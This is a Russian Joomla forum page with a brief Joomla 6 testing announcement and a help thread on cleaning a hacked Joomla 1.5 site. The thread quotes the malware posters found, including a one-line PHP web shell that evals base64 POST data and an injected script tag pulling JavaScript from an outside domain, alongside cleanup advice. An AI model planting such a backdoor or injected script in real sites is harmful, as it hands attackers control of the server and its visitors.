Новости Joomla

Joomla 6 нуждается в вашей помощи с тестированием.Вышел недавно релиз Joomla 6 alpha1

Joomla 6 нуждается в вашей помощи с тестированием.Вышел недавно релиз Joomla 6 alpha1

👩‍💻 Joomla 6 нуждается в вашей помощи с тестированием.Вышел недавно релиз Joomla 6 alpha1. Это релиз, в который включены уже проверенные изменения, но ещё очень многие исправления и улучшения ждут своей очереди. Joomla следит за качеством и безопасностью своего кода и каждое изменение должно быть успешно протестировано как минимум ещё двумя участниками сообщества. Разработка Joomla ведётся на платформе GitHub.Филипп Уолтон (Philip Walton) - один из разработчиков, кто активно вносит свой вклад в ядро Joomla. Он уже несколько месяцев посвящает свои послеполуденные часы пятницы работе с Joomla и предлагает присоединиться к нему. 📆 Пятница, 30 мая 2025, с 15:00 до 17:00 по UTC (Лондон) - с 18:00 до 20:00 по Москве.В чате Google Meet Филипп готов помочь с тестированием тем, кто будет делать это в первый раз. А так же он подготовил список лёгких Pull Request, которые можно протестировать довольно быстро. Чем больше тестов будет проведено сейчас, тем меньше ошибок вылезет потом. На данный момент 148 (уже 147 на момент написания заметки) PR на GitHub Joomla ждут тестирования.👩‍💻 Open to all. All together.Также вам поможет сделать первые шаги это видео.GitHub JoomlaДа, это вечер пятницы. Но тестирование занимает порой минут 15, а доброе дело сделано. Просто убедитесь, что разработчик чего-то не пропустил и всё работает как ожидается.#joomla #joomla6 #community

0 Пользователей и 1 Гость просматривают эту тему.
  • 29 Ответов
  • 18295 Просмотров
*

Voland70

  • Осваиваюсь на форуме
  • 37
  • 0 / 0
Здравствуйте!
Взломан сайт! Требуется помощь специалистов.

Сайт каталог (ZOO) на Joomla 1.5.
При наборе адреса сайта в  адресной строке браузера, все нормально - попадаю на сайт. По ссылке  найденной в поисковой системе   "Яндекс"  -происходит переадресация  на сайты с рекламой. При этом с компьютеров, на которых  установлен антивирус Касперского,  страница не открывается - блокируется антивирусом.  Выводится следующее:

ДОСТУП ЗАПРЕЩЕН
Запрашиваемый URL-адрес не может быть предоставлен

URL-адрес:

http://netavia.jetos.com/

Заблокирован Веб-Aнтивирусом

Причина: вредоносная ссылка

В целях устранения лечения скачал файлы  сайта  с сервера по FTP и проверил антивирусом.  В результате было найдена 2 файла, - Backdoor.PHP.WedShell.etc  и другой название которого не помню. Удалил указанные файлы, сайт работает,  но проблема не решена. Восстановление  из ранних сохранений  - не помогло.
Так же пробовал переустанавливать Joomla, за одно и обновил, но ситуация этим способом так и не была исправлена.

Провел  сканирование файлов сайта сканером  FLS результаты:
Спойлер
[свернуть]
К сожалению в РНР слаб.  

Что можно сделать в данной ситуации ?
« Последнее редактирование: 20.12.2012, 17:06:20 от Voland70 »
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Re: Взломан сайт! - (Backdoor.PHP.WebShell.etc)
« Ответ #1 : 20.12.2012, 19:50:36 »
Цитировать
File: /home/g/gwgroupru/public_html/templates/beez/index.php
String:: _shell_atildi_

это раз
*

Voland70

  • Осваиваюсь на форуме
  • 37
  • 0 / 0
Re: Взломан сайт! - (Backdoor.PHP.WebShell.etc)
« Ответ #2 : 20.12.2012, 21:02:11 »
это раз

Благадарю!

В файле index.php - была всего одна строка:index.php.
Это файл шаблона. При том шаблона который не использовался. Удалил, но это не спасло....
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Re: Взломан сайт! - (Backdoor.PHP.WebShell.etc)
« Ответ #3 : 20.12.2012, 23:40:28 »
Цитировать
File: /home/g/gwgroupru/public_html/images/post.php
String:: $_POST[

два проверить что там

и смотреть сторонний код в *.js и *.php файлах
htaccess проверить
и чистить сайт
*

Voland70

  • Осваиваюсь на форуме
  • 37
  • 0 / 0
Re: Взломан сайт! - (Backdoor.PHP.WebShell.etc)
« Ответ #4 : 21.12.2012, 00:09:57 »
два проверить что там

и смотреть сторонний код в *.js и *.php файлах
htaccess проверить
и чистить сайт
Благадарю за ответ!

В указанном файле  одна строка:
<?php eval(base64_decode($_POST["php"])); ?>

Моих знаний к сожалению не достаточно что бы понять, что в данном файле не так.
.htaccess - вроде бы в порядке, но могу и ошибаться.
Я так понимаю, что во всех указанных при  использовании сканера  FLS файлов и путях к ним содержится вредоносный код. Правильно?
*

WebDisaster

  • Захожу иногда
  • 108
  • 12 / 0
Re: Взломан сайт! - (Backdoor.PHP.WebShell.etc)
« Ответ #5 : 21.12.2012, 05:09:08 »
Моих знаний к сожалению не достаточно что бы понять, что в данном файле не так.
В это файле всё не так. Его нужно удалить. Причём можно практически гарантировать, что он такой "плохой" не единственный.
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Re: Взломан сайт! - (Backdoor.PHP.WebShell.etc)
« Ответ #6 : 21.12.2012, 09:51:17 »
Цитировать
Я так понимаю, что во всех указанных при  использовании сканера  FLS файлов и путях к ним содержится вредоносный код. Правильно?
нет
те файлы которые сканер показывает надо просто проверить
*

Voland70

  • Осваиваюсь на форуме
  • 37
  • 0 / 0
Re: Взломан сайт! - (Backdoor.PHP.WebShell.etc)
« Ответ #7 : 21.12.2012, 12:53:13 »
В это файле всё не так. Его нужно удалить. Причём можно практически гарантировать, что он такой "плохой" не единственный.
Файл удалил, - безрезультатно. Действительно -  файл такой не единственный.

нет
те файлы которые сканер показывает надо просто проверить

Благодарю за ссылку, познавательно.
В статье указанно о том, что ВАЖНО- проверить и поддомены. На хостинге размещен сайт -поддомен, который гораздо популярней основного сайта. С поддомена в поисковиках переадресации не происходит.  Провел сканирование поддомена FLS. Результаты:
Спойлер
[свернуть]

Подскажите пожалуйста на что .htaccess стоит обратить внимание?

*

Voland70

  • Осваиваюсь на форуме
  • 37
  • 0 / 0
Re: Взломан сайт! - (Backdoor.PHP.WebShell.etc)
« Ответ #8 : 21.12.2012, 13:05:39 »
В файле, указанном при сканирование FLS
Цитировать
File: /home/g/gwgroupru/public_html/administrator/components/com_sef/models/config.php
String:: $_POST[

в первой строке есть код:

Цитировать
<?php       eval(base64_decode("DQplcnJvcl9yZXBvcnRpb***p9DQp9"));
- Это лишнее?
« Последнее редактирование: 29.01.2013, 16:23:25 от flyingspook »
*

Voland70

  • Осваиваюсь на форуме
  • 37
  • 0 / 0
Re: Взломан сайт! - (Backdoor.PHP.WebShell.etc)
« Ответ #9 : 21.12.2012, 13:07:03 »

-стоит удалтить файл целиком, или только строку?
*

SmiP

  • Захожу иногда
  • 264
  • 35 / 0
Re: Взломан сайт! - (Backdoor.PHP.WebShell.etc)
« Ответ #10 : 21.12.2012, 13:25:11 »
Ваш base64_decode
Спойлер
[свернуть]

Вот тут обсуждалось
http://joomlaforum.ru/index.php/topic,196376.30.html
У Яндекс-а тоже есть ответ
http://safesearch.ya.ru/replies.xml?item_no=226
*

Voland70

  • Осваиваюсь на форуме
  • 37
  • 0 / 0
Re: Взломан сайт! - (Backdoor.PHP.WebShell.etc)
« Ответ #11 : 22.12.2012, 01:16:36 »
Спасибо за ссылки!

Получил полезную информацию, в соответсnвии с которой пытался провести поиск и замену вредоносного кода  на стороне сервера с использованием скрипта replace.php  (http://cmsdev.org/files/cnt.php?file=replace.zip).   Данный способ мне не помог, по итогам вывелось  сообщение о большом количестве найденных файлов в которых содержится вредоносный код   и об ошибке. Из сообщения следовало, что замена не произведена.
Попробовал другой способ:
Скачал с сервера все файлы сайта, провел средствами Total Commander поиск кода:
Спойлер
[свернуть]

В результате Total Commander – было найдено 1022 файла в которых содержится указанный код. В ручную удалять код из такого количества файлов практически не реально. С использованием программы  Notepad++ произвел замену указанного  кода  <?php eval(base64_decode(.........)
на код "<?php ".

Так же удалил указанные  сканером  файлы в одной из папок шаблонов -templates: index.рнр в котором содержалась строка:
Цитировать
_shell_atildi_

И  файл  из папки с изобращениями images/post.php в котором находилась строка:
Цитировать
<?php eval(base64_decode($_POST["php"])); ?>

Залил почищенные файлы обратно на сервер,  но к положительному результату это  не привело.  По прежнему со ссылок на сайт найденных в поисковых системах  идет переадресация. Антивирусы блокируют страницу.

Что ещё можно сделать?
« Последнее редактирование: 29.01.2013, 16:24:00 от flyingspook »
*

Fedor Vlasenko

  • Живу я здесь
  • 3845
  • 733 / 7
  • https://fedor-vlasenko.web.app
Re: Взломан сайт! - (Backdoor.PHP.WebShell.etc)
« Ответ #12 : 22.12.2012, 01:48:06 »
1. Если не хакали Joomla, можно было заменить файлы из оригинального архива.
2. Notepad++ надо было пользоваться используя регулярные выражения "и новые строки" заменять код вируса на пустое значение.
Модификаций кода может быть много.
3. Сайт надо было проверять антивирусами, желательно 2. Но не лечить и не удалять. Только запоминать и контролировать зараженные файлы, которые лечить в с. п. 1-2
*

Voland70

  • Осваиваюсь на форуме
  • 37
  • 0 / 0
Re: Взломан сайт! - (Backdoor.PHP.WebShell.etc)
« Ответ #13 : 22.12.2012, 12:00:12 »
Ура! Победа!
Благодарю всех за помощь и полезные советы!

После всех проведенных указанных выше мероприятий по замене содержащегося в файлах сайта вредоносного кода, вновь заменил файлы из оригинального архива Jаoomla- и всё! Проблема решена!
*

Людмила Данчук

  • Новичок
  • 1
  • 0 / 0
Re: Взломан сайт! - (Backdoor.PHP.WebShell.etc)
« Ответ #14 : 31.12.2012, 20:11:05 »
как убрать вредоносную ссылку с сайта? помогите!
*

evgen777

  • Давно я тут
  • 657
  • 62 / 2
Re: Взломан сайт! - (Backdoor.PHP.WebShell.etc)
« Ответ #15 : 31.12.2012, 20:29:06 »
Создайте новую тему в этом разделе с подробным описанием проблемы, версией Joomla и ссылкой на сайт.
« Последнее редактирование: 31.12.2012, 20:33:16 от evgen777 »
Разработка, доработка расширений для Joomla!
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Re: Взломан сайт! - (Backdoor.PHP.WebShell.etc)
« Ответ #16 : 31.12.2012, 21:10:51 »
как убрать вредоносную ссылку с сайта? помогите!
Скачать шаблон сайта, и искать вставку base64_decode
И сканер в помощь http://joomlaforum.ru/index.php/topic,198048.0.html
*

oleg-great

  • Захожу иногда
  • 50
  • 0 / 0
Re: Взломан сайт! - (Backdoor.PHP.WebShell.etc)
« Ответ #17 : 28.01.2013, 23:37:23 »
Сканер fls выдал несколько файлов с подозрением на $_POST[ и confirm(
 Нашел в них такое:
Спойлер
[свернуть]
и так далее в таком роде. Зараженные эти файлы или нет?
Если нет, то что должно быть в зараженном коде после $_POST[ и сonfirm(  ?
*

fonclub

  • Захожу иногда
  • 77
  • 12 / 0
  • joomla developer
Re: Взломан сайт! - (Backdoor.PHP.WebShell.etc)
« Ответ #18 : 29.01.2013, 13:18:09 »
Сканер fls выдал несколько файлов с подозрением на $_POST[ и confirm(
 Нашел в них такое:
***
 и так далее в таком роде. Зараженные эти файлы или нет?
Если нет, то что должно быть в зараженном коде после $_POST[ и сonfirm(  ?

Этот сканер выдает все php файлы в которых находит текст, удовлетворяющий условиям поиска. А в условия поиска как раз и входят переменная $_POST и текст confirm и еще много всяких слов) Только это далеко не значит, что найденный файл, содержащий одно из этих слов заражен. Переменная $_POST так же, как и java функция confirm используются в некоторых вполне нормальных компонентах и для того, чтоб отличить инфицированный файл от неинфицированного нужно понимать хоть немного в php. Тогда вы будете видеть что делает данный файл, в котором нашли якобы плохой код и сможете решить удалять его или нет.
Код файла, который вы написали незаражен. А касаемо того что должно быть в зараженном коде - тут нет однозначного ответа, может быть все что угодно)) Я вот сейчас тоже чищу сайт клиента, так там сразу видно, что сайт заражен..
« Последнее редактирование: 29.01.2013, 16:24:45 от flyingspook »
*

IgorArhangel

  • Захожу иногда
  • 89
  • 0 / 0
Re: Взломан сайт! - (Backdoor.PHP.WebShell.etc)
« Ответ #19 : 26.02.2013, 13:17:21 »
Код
<!-- 1bc||stat -->
<script type="text/javascript" src="http://afleks.ru/logs/js.js"></script>
<!-- /1bc||stat -->

Снова заражение. Файл шаблона index.php
Проверил прописался модуль с файлом который взламует конфигурационный файл..
Что сделать что модули не прописывались на сайт?

Я их просто удаляю меняю права на папки и файлы, но снова тоже самое...
Правда пароль еще не менял от фтп)
Смена пароля это значительно?
*

fonclub

  • Захожу иногда
  • 77
  • 12 / 0
  • joomla developer
Re: Взломан сайт! - (Backdoor.PHP.WebShell.etc)
« Ответ #20 : 26.02.2013, 13:19:37 »
Код
<!-- 1bc||stat -->
<script type="text/javascript" src="http://afleks.ru/logs/js.js"></script>
<!-- /1bc||stat -->

Снова заражение. Файл шаблона index.php
Проверил прописался модуль с файлом который взламует конфигурационный файл..
Что сделать что модули не прописывались на сайт?

Я их просто удаляю меняю права на папки и файлы, но снова тоже самое...
Правда пароль еще не менял от фтп)
Смена пароля это значительно?

Смена пароля - это первое, что нужно сделать! Наверняка у них есть ваш пароль и чистить без смены пароля можно до конца жизни.
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Re: Взломан сайт! - (Backdoor.PHP.WebShell.etc)
« Ответ #21 : 26.02.2013, 14:22:53 »
Что сделать что модули не прописывались на сайт?

Я их просто удаляю меняю права на папки и файлы, но снова тоже самое...
Правда пароль еще не менял от фтп)
Смена пароля это значительно?
Ищите шелл, бекдор.Найти- удалить, сменить пароли доступа
*

IgorArhangel

  • Захожу иногда
  • 89
  • 0 / 0
Re: Взломан сайт! - (Backdoor.PHP.WebShell.etc)
« Ответ #22 : 26.02.2013, 14:32:26 »
Ищите шелл, бекдор.Найти- удалить, сменить пароли доступа

Уже нашел и удалил!

Доступ к ftp поменть? Пароль?
*

Evrokub

  • Новичок
  • 5
  • 0 / 0
Re: Взломан сайт! - (Backdoor.PHP.WebShell.etc)
« Ответ #23 : 24.01.2018, 15:49:33 »
является ли данное сообщение антивируса опасным для сайта.

При скачивании файлов сайта evrokub, антивирус заблокировал следующие файлы

http://prntscr.com/i4wj50

Следовательно, что стоит предпринять в данной ситуации?
*

wishlight

  • Гуру
  • 5050
  • 314 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Взломан сайт! - (Backdoor.PHP.WebShell.etc)
« Ответ #24 : 24.01.2018, 15:51:00 »
является ли данное сообщение антивируса опасным для сайта.
Да, ваш сайт заражен. Принимайте меры по устранению заражения.
*

Evrokub

  • Новичок
  • 5
  • 0 / 0
Re: Взломан сайт! - (Backdoor.PHP.WebShell.etc)
« Ответ #25 : 24.01.2018, 16:09:31 »
Я конечно понимаю, сейчас напишут в Google помощь))

А с чего начать?

И какие конкретно меры предпринять с пострадавшими файлами?

Можно, что-то вроде инструкции. Может есть опытные в этой теме.
*

voland

  • Легенда
  • 11028
  • 588 / 112
  • Эта строка съедает место на вашем мониторе
Re: Взломан сайт! - (Backdoor.PHP.WebShell.etc)
« Ответ #26 : 24.01.2018, 16:10:31 »
Я конечно понимаю, сейчас напишут в Google помощь))

А с чего начать?

И какие конкретно меры предпринять с пострадавшими файлами?

Можно, что-то вроде инструкции. Может есть опытные в этой теме.
На инструкцию денег не хватит.
Если надо вылечить - в комм раздел, за адекватные уже деньги можно вылечить
*

Evrokub

  • Новичок
  • 5
  • 0 / 0
Re: Взломан сайт! - (Backdoor.PHP.WebShell.etc)
« Ответ #27 : 24.01.2018, 16:34:32 »
На инструкцию денег не хватит.
Если надо вылечить - в комм раздел, за адекватные уже деньги можно вылечить

конкретнее можно. Адекватные это сколько.

А то тут форум, о воде видимо забыли дописать.
*

voland

  • Легенда
  • 11028
  • 588 / 112
  • Эта строка съедает место на вашем мониторе
Re: Взломан сайт! - (Backdoor.PHP.WebShell.etc)
« Ответ #28 : 24.01.2018, 16:53:18 »
конкретнее можно. Адекватные это сколько.

А то тут форум, о воде видимо забыли дописать.
На форуме есть правила - надо вылечить, идите в коммерческий раздел.
Выпрашивая услугу в чужой теме вы сами нарушаете правила и принуждаете нарушать других.
ЗЫ. В подписях (не только моей) есть ссылки на услуги, там всё расписано, надо только кликнуть
*

wishlight

  • Гуру
  • 5050
  • 314 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Взломан сайт! - (Backdoor.PHP.WebShell.etc)
« Ответ #29 : 24.01.2018, 17:09:23 »
Лечить можно обновив по возможности расширения и ядро Joomla + проверив их на уязвимости хотя бы по публичным спискам, сменив пароли и проверив сайт в параноидальном режиме скриптом айболит (в таком случае читайте отчет от него) и удалить найденный вредоносный код. Не весь код найденный этим скриптом может быть вредоносным, что-то он может не найти. Необходимо самому иметь некоторые навыки.
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

При открытии сайта с режима инкогнито перекидывает на вирусный сайт

Автор 62411

Ответов: 6
Просмотров: 1593
Последний ответ 31.03.2024, 16:14:32
от SeBun
Netflix! - Клиент поймал фишинг на старый сайт. Где порылись собаки?

Автор Alex_gs

Ответов: 9
Просмотров: 1878
Последний ответ 05.11.2021, 21:47:31
от wishlight
Взломали сайт. Как в некоторых случаях делаю я

Автор cntrl

Ответов: 0
Просмотров: 872
Последний ответ 29.08.2020, 00:25:24
от cntrl
Безопасный вход на сайт Joomla и админка

Автор jm

Ответов: 9
Просмотров: 1880
Последний ответ 19.07.2020, 23:57:17
от wishlight
[Руководство] Как защитить сайт на версии 1.5 (не поддерживается разработчиками)

Автор flyingspook

Ответов: 13
Просмотров: 7049
Последний ответ 08.01.2020, 12:52:55
от winstrool